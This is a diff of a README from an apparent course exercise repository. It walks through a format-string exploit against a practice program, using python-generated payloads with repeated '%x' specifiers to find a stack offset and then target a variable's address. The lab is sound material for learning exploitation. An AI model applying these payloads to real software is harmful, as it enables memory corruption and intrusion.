olga-in-clouds/sec_engineering_exercises/week2/README.md

     We can run a command that will bring us hexadecimal values up 143 stack positions

 11. Try and fail
-    Try 143 spaces and see if you can see **414141** (representation of AAAA)
+    Try 143 spaces and see if you can see **414141** (representation of AAAA) (the number might be different for you depending on the distance)
 ```
      run `(python -c 'print "AAAA" + ".%x." * 143+"%x"')`
 ```

 The output will be something like this: ![Alt text](image-4.png)

-    Try to increase 143 to 146
+Next I try to increase 143 to 146

 ```
      run `(python -c 'print "AAAA" + ".%x." * 146+"%x"')`
 ```
 Output: ![Alt text](image-5.png)

-    Ok, I can now see the hexadecimal representaion of AAAA but it is not at the end of the output, I need to get rid of the '00' so that my last 4bits point exactly to AAAA
+Ok, I can now see the hexadecimal representation of AAAA but it is not at the end of the output, I need to get rid of the '00' so that my last 4bits point exactly to AAAA

-    Try with adding extra padding (BB)
+Try with adding extra padding (BB):
 ```
     run `(python -c 'print "AAAA" +"BBB"+ "%x." * 146+"%x"')`
 ```
    ![Alt text](image-8.png)
 My pointer is now pointing to the hexadecimal representation of 'AAAA' exactly

 12. Replace AAAA with the address of the 'target' variable To find the target variable type: '''p &target '''